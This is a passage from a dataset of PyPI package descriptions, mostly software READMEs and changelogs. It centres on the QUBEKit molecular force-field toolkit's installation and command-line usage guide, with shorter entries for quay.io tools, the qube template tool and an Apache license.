[admin]\n\nwoofshop/thingdoer\n- dodgybloke [admin]Installing$pipinstallquayadminRunningEverything is under thequay-admincommand, which has its own help.usage: quay-admin [-h] [--from-state FROM_STATE] [--api-root API_ROOT]\n [--dump-state DUMP_STATE]\n namespace\n\nShow information about quay.io permissions\n\npositional arguments:\n namespace Namespace to look in\n\noptional arguments:\n -h, --help show this help message and exit\n --from-state FROM_STATE\n If provided, get quay.io state from a file, rather\n than an API\n --api-root API_ROOT Root of quay.io API. Ignored if --from-state provided.\n --dump-state DUMP_STATE\n If provided, dump state to a file. Will overwrite file\n if it exists.To do anything useful, you will need an access token that has permission to \u201cAdminister Repositories\u201d.\nSee thequay.io API documentationfor more information.Runningquay-adminwill produce a text report of users who aren\u2019t in your organization\nbut who do have access to your repositories.\nIf such users exist, the script will exit with code 1.The normal state is to gather data from quay.io.\nHowever, you can save all that state with the--dump-stateflag, and then load it later with--from--state.\nThis can be useful for performing your own analysis, or developing new reporting functionality."} +{"package": "quay_client", "pacakge-description": "# quay client[![Build Status](https://travis-ci.org/tinyclues/quay_client.svg?branch=master)](https://travis-ci.org/tinyclues/quay_client) [![Coverage Status](https://coveralls.io/repos/github/tinyclues/quay_client/badge.svg?branch=delete_package)](https://coveralls.io/github/tinyclues/quay_client?branch=delete_package)This is a client for the quay.io api## Contributing to quay clientAll contributions, bug reports, bug fixes, documentation improvements, enhancements and ideas are welcome.### Working with the codeNow that you have an issue you want to fix, enhancement to add, or documentation to improve, you need to learn how to work with GitHub.We use the [Github Flow](https://guides.github.com/introduction/flow/)Finally, commit your changes to your local repository with an explanatory message, quay client uses a convention for commit message prefixes.Here are some common prefixes along with general guidelines for when to use them:* ENH: Enhancement, new functionality* BUG: Bug fix* DOC: Additions/updates to documentation* TST: Additions/updates to tests* BLD: Updates to the build process/scripts* PERF: Performance improvement* CLN: Code cleanup* NOBUILD: special tag to skip test & build"} +{"package": "quaycon", "pacakge-description": "UNKNOWN"} +{"package": "quayside", "pacakge-description": "quaysideDocker is awesome. And a very handy use case of Docker is that it allows to wrap commands that are somewhat difficult to set up in a container that comes with all the dependencies pre-configured. This approach however, comes with the downside that calling Docker is usually a bit more complicated that just calling a local command.This is where quayside comes in. The goal of this app is to provide a simple wrapper for a limited but very repetitive use case.Example usageAn example of a tool, that is offered as a container issslyze.A common call would look like this:docker run --rm -v \"$(pwd):/data/\" nablac0d3/sslyze:5.0.0 www.google.com --json_out /data/result.jsonTo do the same via quayside we need to define sslyze in the quayside configuration. Quayside is searching for its configuration at the following locations:./quayside.yaml~/.quayside.yamlsslyze:container:nablac0d3/sslyze:5.0.0cwd:/data/mapped_arguments:cwd:-\"--json_out\"-\"--targets_in\"-\"--cert\"-\"--key\"-\"--keyform\"-\"--pass\"Now we can call sslyze like this:quayside sslyze --json_out=result.json www.google.comThe current working directory is automatically mounted at/data/and paths that are passed to one of themapped argumentsare interpreted relative to that folder."} +{"package": "quazar", "pacakge-description": "No description available on PyPI."} +{"package": "qub-amphibian-report-generator", "pacakge-description": "REPORT GENERATORRequirementsPython3 installation is required. The Python3 Venv package is recommended.If Python3 is not available - the project can be run by downloading the executables folder that matches the OS that your computer uses. The project can be started by opening the report-generator file.InstallationInstallation from PyPITo install from PyPI and using pip it is recommended to initially set up a virtual environment or use a package manager like poetry.Create Venvpython3 -m venv {venv-name}Activate VenvThen activate the venv.source {venv-name}/bin/activateInstall packageThen install the package.pip install qub-amphibian-report-generatorUseGUIOnce the package has been installed and setup the Report Generator program can be used from venv with the command:report-generatorThis will start the GUI application for the report generator. If the report-generator command has not been run before it will begin the project setup process.Project SetupThe user will need to enter some project settings information:The process will download relevant data files and create and insert data into project databases:Create ReportThis will then allow the user to run the report generator again and produce the outputted pdf file.CLIIf the user wants to use the CLI:report-generator --cli [options]CLI default reportCLI filtered reportCLI optionsCLI options can be found with the command:report-generator -h\n report-generator -helpOr can be found in the projects documentation.New Project with CLIIf the user wants to set up a new project:create-report-generatorDocumentationProject documentation can be foundhereVersionsArchived versions of the Report Generator Program can be found in links to repositories belowReport Generator V1Report Generator V2Changelog"} +{"package": "qube", "pacakge-description": "QBiC\u2019s internal project template collection.Free software: MITDocumentation:https://qube.readthedocs.io.FeaturesCreate one of QBiC\u2019s internal project templates (Java, Groovy or R based)List all available templatesLint the project to verify that it adheres to QBiC\u2019s standardsConveniently bump the version of any qube projectCreditsThis package was created withcookietemplebased on a modifiedaudreyr/cookiecutter-pypackageproject template usingCookiecutter.ChangelogThis project adheres toSemantic Versioning.2.6.1 (2020-11-06)AddedAdd report generation script to common filesFixedDependenciesDeprecated2.6.0 (2020-10-27)AddedAdd template for OSGi Groovy library bundlesAdd template for OSGi Groovy portlet bundlesFixedFix missing license property bug, that showed up if the license placeholder was referenced in a template.DependenciesDeprecatedJava 8, templates now build with JDK 11.2.5.1 (2020-10-16)AddedFixedqube lint now wraps too long linesDependenciesDeprecated2.5.0 (2020-10-06)Addedverbose support #186Fixedsync workflow now polls instead of being triggered on push #170renamed branch protection workflow #190refactored sync commandFaster build time by fixing the order of Maven repositories for dependency resolvingIgnore rule for Vaadin widgetsetsDependenciesDeprecated2.4.6 (2020-10-02)AddedFixedFix missing properties for portlet domainFix #169DependenciesDeprecated2.4.5 (2020-10-02)AddedIgnores additional Maven filesFixedPreserve boolean case when loading YAML boolean valuesForce push changes to the TEMPLATE branch during syncDependenciesDeprecated2.4.4 (2020-10-02)AddedFixedFix the pull request creation after updating syncing the TEMPLATE branch. Qube reported aFileNotFoundErrorfor the sync workflow file, because it tried to access this file in an empty directory.Removed redundant sync_workflow workaroundssync and maven test workflow yaml syntaxDependenciesDeprecated2.4.3 (2020-10-01)AddedFixedSets correct repo owner for theqube syncDependenciesDeprecated2.4.2 (2020-10-01)AddedEnables debug loggingFixedDependenciesDeprecated2.4.1 (2020-10-01)AddedFixedDependenciesUpdated parent pom to 3.1.1Updated template versions to 1.0.1Deprecated2.4.0 (2020-10-01)AddedNow using Johnny5 for the sync workflow by defaultMaven caching for testsFixedAdd allsrc/main/webapp/VAADIN/widgetsetsfolders to.gitignoreMakefile now uses pip instead of setup.py by defaultDependenciesDeprecated2.3.0 (2020-09-28)AddedAdded release deployment GA workflow for JVM templatesAdded workflow to build software reports and internal documentationFixedFixed parent-pom version being outdated -> 3.1.0Fixed further outdated dependencies in various pomsFixed release URL in all pomsAllow PR from \u2018hotfix\u2019 branchesDependenciesDeprecatedRemoved PR allowance from patch branchesRemoved Travis CI support2.2.0 (2020-08-21)AddedFixedCouple of docs fixesNow always using hyphens for optionsDependenciesDeprecated2.1.0 (2020-08-21)AddedOption to config \u2013view to get the current set configurationOption \u2013set_token to set the sync token againSync docs improvedSupport for QUBE TODO: and TODO QUBE:FixedSync for organization repositoriesDependenciesDeprecated2.0.0 (2020-08-17)AddedStrong code refactoring overhauling everythingAdded config command to recreate config filesAdded upgrade command to update qube itselfAdded sync command to sync a qube projectHelp messages are now customBump-version lints versions before updatingAdded a metaclass to fetch all linting functionsMaster requires PR review & no stale PRsGreatly improved the documentationMuch more\u2026FixedPR check WF now correctly requires PRs to master to be frompatchorreleasebranchesDependenciesToo many updates to jot down\u2026!Deprecated1.4.1 (2020-05-23)AddedFixedReverted simplified common files copying, since it broke Github supportDependenciesDeprecated1.4.0 (2020-05-23)AddedAdded Rich for tracebacks & nice tablesNew ASCII Art!FixedDependenciesDeprecated1.3.2 (2020-05-22)AddedStrongly simplified common files copyinginfo now automatically reruns the most similar handleFixedDependenciesDeprecated1.3.1 (2020-05-20)AddedChecking whether project already exists on readthedocsFixedbump-version SNAPSHOT handling strongly improvedDependenciesrequests==2.23.0 addedpackaging==20.4 addedDeprecated1.3.0 (2020-05-20)Addedbump-version now supports SNAPSHOTSdocumentation about 4 portlet promptsnew COOKIETEMPLE docs cssFixedTests GHW namesDependenciesDeprecated1.2.1 (2020-05-03)AddedRefactored docs into common filesFixedDependenciesDeprecated1.2.0 (2020-05-03)AddedQUBE linting workflow for all templatesPR to master from development only WFcustom COOKIETEMPLE cssFixedsetup.py development statusmax width for docs for all templatesPyPi badge is now greenDependenciesflake 3.7.9 -> 3.8.1Deprecated1.1.0 (2020-05-03)AddedThe correct version tag :)FixedReadthedocs width is nowDependenciesDeprecated1.0.0 (2020-05-03)AddedCreated the project using COOKIETEMPLEAdded create, list, info, bump-version, lint based on COOKIETEPLEAdded cli-java templateAdded lib-java templateAdded gui-java templateAdded service-java templateAdded portlet-groovy templateFixedDependenciesDeprecated"} +{"package": "qubed-tools", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qubekit", "pacakge-description": "QUBEKit -Quantum MechanicalBespoke force field toolkitNewcastle University UK - Cole GroupStatusFoundationInstallationTable of ContentsWhat is QUBEKit?DevelopmentInstallationRequirementsHelpConfig FilesQUBEKit CommandsRunning JobsSome ExamplesLoggingHigh ThroughputCustom Start and End PointsSingle MoleculesSkipping StagesMultiple MoleculesChecking ProgressOther Commands and InformationCook BookWhat is QUBEKit?QUBEKitis a Python 3.6+ based force field derivation toolkit for Linux operating systems.\nOur aims are to allow users to quickly derive molecular mechanics parameters directly from quantum mechanical calculations.\nQUBEKit pulls together multiple pre-existing engines, as well as bespoke methods to produce accurate results with minimal user input.\nQUBEKit aims to avoid fitting to experimental data where possible while also being highly customisable.Users who have used QUBEKit to derive any new force field parameters should cite the following papers:QUBEKit: Automating the Derivation of Force Field Parameters from Quantum MechanicsBiomolecular Force Field Parameterization via Atoms-in-Molecule Electron Density PartitioningHarmonic Force Constants for Molecular Mechanics Force Fields via Hessian Matrix ProjectionIn DevelopmentQUBEKit should currently be considered a work in progress.\nWhile it is stable we are constantly working to improve the code and broaden its compatibilities.We use lots of software written by many different people;\nif reporting a bug please (to the best of your ability) make sure it is a bug with QUBEKit and not with a dependency.\nWe welcome any suggestions for additions or changes.InstallationTo install, it is possible to use git, pip or conda(help).\nGit has our latest version which will likely have newer features but may not be stable.We recommend installing via conda. This will install all necessary dependencies.git clone https://github.com/qubekit/QUBEKit.git\ncd \npython setup.py installpip install qubekitconda install -c cringrose qubekitRequirementsAnaconda3Download Anaconda from the above link and install with the linux command:./Anaconda3.shYou may need to usechmod +x Anaconda3.shto make it executable.We recommend you add conda to your .bashrc when prompted.Gaussian09Installation of Gaussian is likely handled by your institution; QUBEKit uses it for density calculations only.\nIf you don't plan on performing these sorts of calculations then it is not necessary.\nIf you do, please make sure Gaussian09 is executable with the commandg09.ChargemolChargemol can be downloaded and installed from a zip file in the above link.\nBe sure to add the path to the QUBEKit configs once you've generated them(explanation).Core RequirementsAll conda packages are included in the conda install:conda install -c cringrose qubekitBelow details some of the core requirements included in the conda install of QUBEKit.PSI4conda install -c psi4 psi4GeomeTRICconda install -c conda-forge geometricOpenMMconda install -c omnia openmmRDKitconda install -c rdkit rdkitOpenForceFieldconda install -c omnia openforcefieldQCEnginepip install qcengineTorsionDriveconda install -c conda-forge torsiondriveAmberminiconda install -c omnia amberminiGUI RequirementsPyQt5pip install PyQt5PyQtWebEngine 5.12.1pip install PyQtWebEngineAdding lots of packages can be a headache. If possible, install using Anaconda through the terminal.\nThis is generally safest, as Anaconda should deal with versions and conflicts in your environment.\nGenerally, conda packages will have the conda install command on their website or github.\nFor the software not available through Anaconda, or if Anaconda is having trouble resolving conflicts, either git clone them and install:git clone http://\ncd \npython setup.py installor follow the described steps in the respective documentation.Installing as devIf downloading QUBEKit to edit the latest version of the source code,\nthe easiest method is install via conda, then remove the conda version of qubekit and git clone.\nThis is accomplished with a few simple commands:# Install QUBEKit as normal\nconda install -c cringrose qubekit\n\n# Remove ONLY the QUBEKit package itself, leaving all dependencies installed\n# and on their correct version\nconda remove --force qubekit\n\n# Re-download QUBEKit outside of conda\ngit clone https://github.com/qubekit/QUBEKit.git\n\n# Re-install QUBEKit outside of conda\ncd QUBEKit/\npython setup.py installHelpBelow is general help for most of the commands available in QUBEKit.\nThere is some short help available through the terminal (invoked with-h)\nbut all necessary long-form help is within this document.Config filesQUBEKit has a lot of settings which are used in production and changing these can result in very different force field parameters.\nThe settings are controlled using ini style config files which are easy to edit.\nAfter installation you should notice aQUBEKit_configsfolder in your main home directory; now you need to create a master template.\nTo do this, use the commandQUBEKit -setupwhere you will be presented with the following:You can now edit config files using QUBEKit, chose an option to continue:\n1) Edit a config file\n2) Create a new master template\n3) Make a normal config fileChoose option two to set up a new template which will be used every time you run QUBEKit\n(unless you supply the name of another ini file in the configs folder).\nThe only parameter thatmustbe changed for QUBEKit to run is the Chargemol path in the descriptions section.\nThis option is what controls where the Chargemol code is accessed from on your PC.\nIt should be the location of the Chargemol home directory, plus the name of the Chargemol folder itself to account for version differences:'/home//Programs/chargemol_09_26_2017'Following this, feel free to change any of the other options such as the basis set.QUBEKitdoeshave a full suite of defaults built in.\nYou do not necessarily need to create and manage an ini config file; everything can be done through the terminal commands.\nTo make it easier to keep track of changes however, we recommend you do use a config file,\nor several depending on the analysis you're doing.You can change which config file is being used at runtime using the command:-config .iniOtherwise, the defaultmaster_config.iniwill be used.QUBEKit Commands: Running JobsRunning a job entirely on defaults, is as simple as typing-ifor input, followed by the pdb file name, for example:QUBEKit -i methane.pdbThis will perform a start-to-finish analysis on themethane.pdbfile using the default config ini file.\nFor anything more complex, you will need to add more commands.Given a list of commands, such as:-setup,-progresssome are taken as single word commands.\nOthers however, such as changing defaults: (-c 0), (-m 1), are taken as tuple commands.\nThe first command of tuple commands is always preceded by a-, while the latter commands are not: (-skipdensitycharges).\n(An error is raised for 'hanging' commands e.g.-c,1or-sm.)All commands can be provided in any order, as long as tuple commands are paired together.All configuration commands are optional. If nothing at all is given, the program will run entirely with defaults.\nQUBEKit onlyneedsto know the molecule you're analysing, given with-i.pdbor-sm.Files to be analysed must be written with their file extension (.pdb) attached or they will not be recognised commands.\nAll commands should be given in lower case with two main exceptions;\nyou may use whatever case you like for the name of files (e.g.-i DMSO.pdb) or the name of the directory (e.g.-log Run013).QUBEKit Commands: Some ExamplesA full list of the possible command line arguments is given below in theCook Booksection.\nThis section covers some simple examplesRunning a full analysis onmolecule.pdbwith a non-default charge of1, the default charge engineChargemoland with GeomeTRICoff:\nNote, ordering does not matter as long as tuples commands (-c1) are together.-iis for the input,-cdenotes the charge and-geois for (en/dis)abling geomeTRIC.QUBEKit -i molecule.pdb -c 1 -geo false\nQUBEKit -c 1 -geo false -i molecule.pdbRunning a full analysis with a non-default bonds engine: Gaussian09 (g09):QUBEKit -i molecule.pdb -bonds g09The program will tell the user which defaults are being used, and which commands were given.\nErrors will be raised for any invalid commands and the program will not run.\nA full log of what's happening will be created in aQUBEKit_log.txtfile.Try running QUBEKit with the command:QUBEKit -sm C methane -end hessianThis will generate a methane pdb file (and mol file) using its smiles string:C,\nthen QUBEKit will analyse it until the hessian is calculated.\nSeeQUBEKit Commands: Custom Start and End Points (single molecule)below for more details on-end.QUBEKit Commands: LoggingEach time QUBEKit runs, a new working directory containing a log file will be created.\nThe name of the directory will contain the run number or name provided via the terminal command-log(or the run number or name from the configs if a-logcommand is not provided).\nThis log file will store which methods were called, how long they took, and any docstring for them (if it exists).\nThe log file will also contain information regarding the config options used, as well as the commands given and much more.\nThe log file updates in real time and contains far more information than is printed to the terminal during a run.\nIf there is an error with QUBEKit, the full stack trace of an exception will be stored in the log file.The error printed to the terminal may be different and incorrect so it's always better to check the log file.Many errors have custom exceptions to help elucidate if, for example, a module has not been installed correctly.The format for the name of the active directory is:QUBEKit_moleculename_YYYY_MM_DD_runnumberIf using QUBEKit multiple times per day with the same molecule, it is therefore necessary to update the 'run number'.\nNot updating the run number when analysing the same molecule on the same day will prevent the program from running.\nThis is to prevent the directory being overwritten.Updating the run number can be done with the command:-log Prop1201whereProp1201is an example string which can be almost anything you like (no spaces or special characters).Inputs are not sanitised so code injection is possible but given QUBEKit's use occurs locally, you're only hurting yourself!\nIf you don't understand this, don't worry, just use alphanumeric log names like above.QUBEKit Commands: High ThroughputBulk commands are for high throughput analysis; they are invoked with the-bulkkeyword.\nA csv must be used when running a bulk analysis.\nIf you would like to generate a blank csv config file, simply run the command:QUBEKit -csv example.csvwhere example.csv is the name of the config file you want to create.\nThis will automatically generate the file with the appropriate column headers.\nThe csv config file will be put into wherever you ran the command from.\nWhen writing to the csv file, append rows after the header row, rather than overwriting it.If you want to limit the number of molecules per csv file, simply add an argument to the command.\nFor example, if you have 23 pdb files and want to analyse them 12 at a time, use the command:QUBEKit -csv example.csv 12This will generate two csv files, one with 12 molecules inside, the other with the remaining 11.\nYou can then fill in the rest of the csv as desired, or run immediately with the defaults.Before running a bulk analysis, fill in each column for each molecule*;\nimportantly, different config files can be supplied for each molecule.*Only the name column needs to be filled (which is filled automatically with the generated csv),\nany empty columns will simply use the default values:If the charge column is empty, charge will be set to 0;If the multiplicity column is empty, multiplicity will be set to 1;If the config column is empty, the default config is used;The smiles string column only needs to be filled if a pdb isnotsupplied;Leaving the restart column empty will start the program from the beginning;Leaving the end column empty will end the program after a full analysis.A bulk analysis is called with the-bulkcommand, followed by the name of the csv file:QUBEKit -bulk example.csvAny pdb files should all be in the same place: where you're running QUBEKit from.\nUpon executing this bulk command, QUBEKit will work through the rows in the csv file.\nEach molecule will be given its own directory and log file (the same as single molecule analyses).Please note, there are deliberately two config files.\nThe changeable parameters are spread across a .csv and a .ini config files.\nThe configs in the .ini are more likely to be kept constant across a bulk analysis.\nFor this reason, the .csv config contains highly specific parameters such as torsions which will change molecule to molecule.\nThe .ini contains more typically static parameters such as the basis sets and engines being used (e.g. PSI4, Chargemol, etc).\nIf you would like the ini config to change from molecule to molecule, you may specify that in the csv config.You can change defaults inside the terminal when running bulk analyses, and these changed defaults will be printed to the log file.\nHowever, the config files themselves will not be overwritten.\nIt is therefore recommended to manually edit the config files rather than doing, for example:QUBEKit -bulk example.csv -log run42 -ddec 3 -solvent trueBe aware that the names of the pdb files are used as keys to find the configs.\nSo, each pdb being analysed should have a corresponding row in the csv file with the correct name\n(if using smiles strings, the name column will just be the name given to the created pdb file).For example (csv row order does not matter, and you do not need to include smiles strings when a pdb is provided; column orderdoesmatter):/:\n benzene.pdb\n ethane.pdb\n bulk_example.csv\n\nbulk_example.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,default_config,C,,,\n benzene,,,default_config,,,,\n ethane,,,default_config,,,,QUBEKit Commands: Custom Start and End Points (single molecule)QUBEKit also has the ability to run partial analyses, or redo certain parts of an analysis.\nFor a single molecule analysis, this is achieved with the-endand-restartcommands.The stages are:parametrise- The molecule is parametrised using OpenFF, AnteChamber or XML.\nThis step also loads in the molecule and extracts key information like the atoms and their coordinates.mm_optimise- This is a quick, preliminary optimisation which speeds up later optimisations.qm_optimise- This is the main optimisation stage, default method is to use PSI4 with GeomeTRIC.hessian- This again uses PSI4 to calculate the Hessian matrix which is needed for calculating bonding parameters.mod_sem- Using the Hessian matrix, the bonds and angles terms are calculated with the Modified Seminario Method.density- The density is calculated using Gaussian09. This is where the solvent is applied as well (if configured).charges- The charges are partitioned and calculated using Chargemol with DDEC3 or 6.lennard_jones- The charges are extracted and Lennard-Jones parameters calculated, ready to produce an XML.torsion_scan- Using the molecule's geometry, a torsion scan is performed.\nThe molecule can then be optimised with respect to these parameters.torsion_optimise- The optimisation step for the torsional analysis.finalise- This step (which is always performed, regardless of end-point) produces an XML for the molecule.\nThis stage also prints the final information to the log file and a truncated version to the terminal.In a normal run, all of these stages are called sequentially,\nbut with-endand-restartyou are free to runfromany steptoany step inclusively.When using-end, simply specify the end-point in the proceeding command (defaultfinalise),\nwhen using-restart, specify the start-point in the proceeding command (defaultparametrise).\nThe end-point (if notfinalise) can then be specified with the-endcommand.When using these commands, all other config-changing commands can be used in the same ways as before. For example:QUBEKit -i methanol.pdb -end charges\nQUBEKit -restart qm_optimise -end density\nQUBEKit -i benzene.pdb -log BEN001 -end charges -geo false \nQUBEKit -restart hessian -ddec 3If using-endbut not-restart, a new directory and log file will be created within wherever the command is run from.\nJust like a normal analysis.However, using-restartrequires files and other information from previous executions.\nTherefore,-restartcan only be run frominsidea directory with those files present.Note: you do not need to use the-i(input file) command when restarting, QUBEKit will detect the pdb file for you.To illustrate this point, a possible use case would be to perform a full calculation on the molecule ethane,\nthen recalculate using a different (set of) default value(s):QUBEKit -i ethane.pdb -log ETH001\n...\ncd QUBEKit_ethane_2019_01_01_ETH001\nQUBEKit -restart density -end charges -ddec 3Here, the calculation was performed with the default DDEC version 6, then rerun with version 3 instead, skipping over the early stages which would be unchanged.\nIt is recommended to copy (not cut) the directory containing the files because some of them will be overwritten when restarting.Note that because-restartwas used, it was not necessary to specify the pdb file name with-i.QUBEKit Commands: Skipping StagesThere is another command for controlling the flow of execution:-skip.\nThe skip command allows you to skip any number ofproceedingsteps.\nThis is useful if using a method not covered by QUBEKit for a particular stage,\nor if you're just not interested in certain time-consuming results.-skiptakes at least one argument and on use will completely skip over the provided stage(s).\nSay you are not interested in calculating bonds and angles, and simply want the charges; the command:QUBEKit -i acetone.pdb -skip hessian mod_semwill skip over the Hessian matrix calculation which is necessary for the modified Seminario method (skipping that too).\nQUBEKit will then go on to calculate density, charges and so on.Beware skipping steps which are required for other stages of the analysis.Just like the other commands,-skipcan be used in conjunction with other commands like config changing,\nand-endor-restart. Using the same example above, you can stop having calculated charges:QUBEKit -i acetone.pdb -skip hessian mod_sem -end charges-skipis not available for-bulkcommands and probably never will be.\nThis is to keep bulk commands reasonably simple.\nWe recommend creating a simple script to run single analysis commands if you would like to skip stages frequently.In case you want to add external files to be used by QUBEKit, empty folders are created in the correct place even when skipped.\nThis makes it easy to drop in, say, a .cube file from another charges engine,\nthen calculate the Lennard-Jones parameters with QUBEKit.QUBEKit Commands: Custom Start and End Points (multiple molecules)When using custom start and/or end points with bulk commands, the stages are written to the csv file, rather than the terminal.\nIf no start point is specified, a new working directory and log file will be created.\nOtherwise, QUBEKit will find the correct directory and log file based on the log string and molecule name.\nThis means thelog string cannot be changed when restarting a bulk run.\nThere will however be a clear marker in the log file, indicating when an analysis was restarted.Using a similar example as above, two molecules are analysed with DDEC6, then restarted for analysis with DDEC3:first_run.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n ethane,,,ddec6_config,,,,charges\n benzene,,,ddec6_config,,,,charges\n\nQUBEKit -bulk first_run.csv\n\n(optional: copy the folders produced to a different location to store results)\n\n\nsecond_run.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n ethane,,,ddec3_config,,,density,charges\n benzene,,,ddec3_config,,,density,charges\n\nQUBEKit -bulk second_run.csvThe first execution uses a config file for DDEC6 and runs from the beginning up to the charges stage.\nThe second execution uses a config file for DDEC3 and runs from the density stage to the charges stage.QUBEKit Commands: Checking ProgressThroughout an analysis, key information will be added to the log file.\nThis information can be quickly parsed by QUBEKit's-progresscommandTo display the progress of all analyses in your current directory and below, use the command:QUBEKit -progressQUBEKit will find the log files in all QUBEKit directories and display a colour-coded table of the progress.Tick marks indicate a stage has completed successfullyTildes indicate a stage has not finished nor erroredAn S indicates a stage has been skippedAn E indicates that a stage has started and failed for some reason.\nViewing the log file will give more information as towhyit failed.QUBEKit Commands: Other Commands and InformationYou cannot run multiple kinds of analysis at once. For example:QUBEKit -bulk example.csv -i methane.pdb -bonds g09is not a valid command. These should be performed separately:QUBEKit -bulk example.csv\nQUBEKit -i methane.pdb -bonds g09Be wary of running QUBEKit concurrently through different terminal windows.\nThe programs QUBEKit calls often just try to use however much memory is assigned in the config files;\nthis means they may try to take more than is available, leading to a crash.Cook BookComplete analysis of single molecule from its pdb file using only defaults:QUBEKit -i molecule.pdbAll commands can be viewed by callingQUBEKit -h. Below is an explanation of what all these commands are:Enable or disable GeomeTRIC (bool):-geo trueor-geo falseChange DDEC version (int; 3 or 6):-ddec 3or-ddec 6Enable or disable the solvent model (bool):-solvent trueor-solvent falseChange the method for initial parametrisation (str; openff, xml or antechamber):-param openff,-param xml,-param antechamberChange the log file name and directory label (str; any):-log Example123Change the functional being used (str; any valid psi4/g09 functional):-func B3LYPChange the basis set (str; any valid psi4/g09 basis set):-basis 6-31GChange the vibrational scaling used with the basis set (float; e.g. 0.997):-vib 0.967Change the amount of memory allocated (int; do not exceed computer's limits!):-memory 4Change the number of threads allocated (int; do not exceed computer's limits!):-threads 4Complete analysis of ethane from its smiles string using DDEC3, OpenFF and no solvent (-logcommand labels the analysis):QUBEKit -sm CC -ddec 3 -param openff -solvent false -log ethane_exampleAnalyse benzene from its pdb file until the charges are calculated; use DDEC3:QUBEKit -i benzene.pdb -end charges -ddec 3 -log BENZ_DDEC3Redo that analysis but use DDEC6 instead:(Optional) Copy the folder and change the name to indicate it's for DDEC6:cp -r QUBEKit_benzene_2019_01_01_BENZ_DDEC3 QUBEKit_benzene_2019_01_01_BENZ_DDEC6(Optional) Move into the new folder:cd QUBEKit_benzene_2019_01_01_BENZ_DDEC6Rerun the analysis with the DDEC version changed.\nThis time we can restart just before the charges are calculated to save time.\nHere we're restarting from density and finishing on charges:QUBEKit -restart density -end charges -ddec 6This will still produce an xml in thefinalisefolder.Analyse methanol from its smiles string both with and without a solvent:QUBEKit -sm CO -solvent true -log Methanol_Solvent(Optional) Create and move into new foldercp -r QUBEKit_methanol_2019_01_01_Methanol_Solvent QUBEKit_methanol_2019_01_01_Methanol_No_Solvent\ncd QUBEKit_methanol_2019_01_01_Methanol_No_Solvent\n\nQUBEKit -solvent false -restart densityCalculate the density for methane, ethane and propane using their pdbs:Generate a blank csv file with a relevant name:QUBEKit -csv density.csvFill in each row like so:density.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,master_config.ini,,,,density\n ethane,,,master_config.ini,,,,density\n propane,,,master_config.ini,,,,densityRun the analysis:QUBEKit -bulk density.csvNote, you can add more commands to the execution but it is recommended that changes are made to the config files instead.Running the same analysis but using the smiles strings instead; this time do a complete analysis:Generate a blank csv with the namesimple_alkanes:QUBEKit -csv simple_alkanes.csvFill in the csv file like so:simple_alkanes.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,master_config.ini,C,,,\n ethane,,,master_config.ini,CC,,,\n propane,,,master_config.ini,CCC,,,Run the analysis:QUBEKit -bulk simple_alkanes.csvJust calculating charges for acetone:Skip hessian and mod_sem, the two stages used to calculate the bonds and angles,\nthen end the analysis after the charge calculation.QUBEKit -i acetone.pdb -skip hessian mod_sem -end charges"} +{"package": "qubell-api-python-client", "pacakge-description": "Version 2.0, January 2004http://www.apache.org/licenses/TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION1. Definitions.\"License\" shall mean the terms and conditions for use, reproduction, anddistribution as defined by Sections 1 through 9 of this document.\"Licensor\" shall mean the copyright owner or entity authorized by the copyrightowner that is granting the License.\"Legal Entity\" shall mean the union of the acting entity and all other entitiesthat control, are controlled by, or are under common control with that entity.For the purposes of this definition, \"control\" means (i) the power, direct orindirect, to cause the direction or management of such entity, whether bycontract or otherwise, or (ii) ownership of fifty percent (50%) or more of theoutstanding shares, or (iii) beneficial ownership of such entity.\"You\" (or \"Your\") shall mean an individual or Legal Entity exercisingpermissions granted by this License.\"Source\" form shall mean the preferred form for making modifications, includingbut not limited to software source code, documentation source, and configurationfiles.\"Object\" form shall mean any form resulting from mechanical transformation ortranslation of a Source form, including but not limited to compiled object code,generated documentation, and conversions to other media types.\"Work\" shall mean the work of authorship, whether in Source or Object form, madeavailable under the License, as indicated by a copyright notice that is includedin or attached to the work (an example is provided in the Appendix below).\"Derivative Works\" shall mean any work, whether in Source or Object form, thatis based on (or derived from) the Work and for which the editorial revisions,annotations, elaborations, or other modifications represent, as a whole, anoriginal work of authorship. For the purposes of this License, Derivative Worksshall not include works that remain separable from, or merely link (or bind byname) to the interfaces of, the Work and Derivative Works thereof.\"Contribution\" shall mean any work of authorship, including the original versionof the Work and any modifications or additions to that Work or Derivative Worksthereof, that is intentionally submitted to Licensor for inclusion in the Workby the copyright owner or by an individual or Legal Entity authorized to submiton behalf of the copyright owner. For the purposes of this definition,\"submitted\" means any form of electronic, verbal, or written communication sentto the Licensor or its representatives, including but not limited tocommunication on electronic mailing lists, source code control systems, andissue tracking systems that are managed by, or on behalf of, the Licensor forthe purpose of discussing and improving the Work, but excluding communicationthat is conspicuously marked or otherwise designated in writing by the copyrightowner as \"Not a Contribution.\"\"Contributor\" shall mean Licensor and any individual or Legal Entity on behalfof whom a Contribution has been received by Licensor and subsequentlyincorporated within the Work.2. Grant of Copyright License.Subject to the terms and conditions of this License, each Contributor herebygrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,irrevocable copyright license to reproduce, prepare Derivative Works of,publicly display, publicly perform, sublicense, and distribute the Work and suchDerivative Works in Source or Object form.3. Grant of Patent License.Subject to the terms and conditions of this License, each Contributor herebygrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,irrevocable (except as stated in this section) patent license to make, havemade, use, offer to sell, sell, import, and otherwise transfer the Work, wheresuch license applies only to those patent claims licensable by such Contributorthat are necessarily infringed by their Contribution(s) alone or by combinationof their Contribution(s) with the Work to which such Contribution(s) wassubmitted. If You institute patent litigation against any entity (including across-claim or counterclaim in a lawsuit) alleging that the Work or aContribution incorporated within the Work constitutes direct or contributorypatent infringement, then any patent licenses granted to You under this Licensefor that Work shall terminate as of the date such litigation is filed.4. Redistribution.You may reproduce and distribute copies of the Work or Derivative Works thereofin any medium, with or without modifications, and in Source or Object form,provided that You meet the following conditions:You must give any other recipients of the Work or Derivative Works a copy ofthis License; andYou must cause any modified files to carry prominent notices stating that Youchanged the files; andYou must retain, in the Source form of any Derivative Works that You distribute,all copyright, patent, trademark, and attribution notices from the Source formof the Work, excluding those notices that do not pertain to any part of theDerivative Works; andIf the Work includes a 